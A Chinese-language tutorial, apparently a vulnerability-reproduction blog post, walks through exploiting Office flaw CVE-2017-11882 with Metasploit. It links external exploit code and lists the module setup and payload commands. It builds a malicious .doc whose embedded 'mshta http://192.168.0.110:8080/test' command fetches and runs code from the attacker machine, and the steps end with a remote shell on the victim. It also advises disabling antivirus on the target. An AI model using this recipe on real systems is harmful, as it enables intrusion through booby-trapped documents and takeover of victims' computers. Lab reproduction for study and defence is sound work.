office漏洞 CVE-2017-11882 msf利用

目标机:一台安装好office漏洞版本的电脑

攻击机:一台kai liunx                       ip:192.168.0.110

python脚本下载链接:https://github.com/Ridter/CVE-2017-11882

office漏洞 CVE-2017-11882 msf利用_第1张图片

msf组件下载:https://github.com/0x09AL/CVE-2017-11882-metasploit

一.把上面下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下

office漏洞 CVE-2017-11882 msf利用_第2张图片

二.把下载的cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/

office漏洞 CVE-2017-11882 msf利用_第3张图片

要是不放这个文件可能后面执行exploit时会出现运行失败

三.骚操作开始了,打开神器metasploit

office漏洞 CVE-2017-11882 msf利用_第4张图片

四.使用命令search cve_2017_11882 查找对应的模块

office漏洞 CVE-2017-11882 msf利用_第5张图片

五.使用命令use exploit/windows/smb/cve_2017_11882设置payload为反弹top

office漏洞 CVE-2017-11882 msf利用_第6张图片

六.使用命令set lhost 192.168.0.110(攻击机的ip)

office漏洞 CVE-2017-11882 msf利用_第7张图片

七.使用命令set URIPATH test设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)

office漏洞 CVE-2017-11882 msf利用_第8张图片

八.检查配置,show options

office漏洞 CVE-2017-11882 msf利用_第9张图片

九.运行,exploit -j

office漏洞 CVE-2017-11882 msf利用_第10张图片

十.另外打开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.110:8080/test" -o test4.doc  生成恶意doc文件

office漏洞 CVE-2017-11882 msf利用_第11张图片注意要加上端口8080,加上上面设置的URI路径

十一.复制文件到目标机打开

office漏洞 CVE-2017-11882 msf利用_第12张图片360可能会杀掉最好关了

十二.返回攻击机kai liunx,看到鱼儿已经上钩了

office漏洞 CVE-2017-11882 msf利用_第13张图片

十三.使用命令sessions -i进行查看

office漏洞 CVE-2017-11882 msf利用_第14张图片

十四.输出命令sessions -i 1,切换进入

office漏洞 CVE-2017-11882 msf利用_第15张图片

十五.现在我们成功的获取了目标机,输入shell,进入我们熟悉的cmd界面,并使用一下cmd命令。

office漏洞 CVE-2017-11882 msf利用_第16张图片

感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!

你可能感兴趣的:(漏洞复现)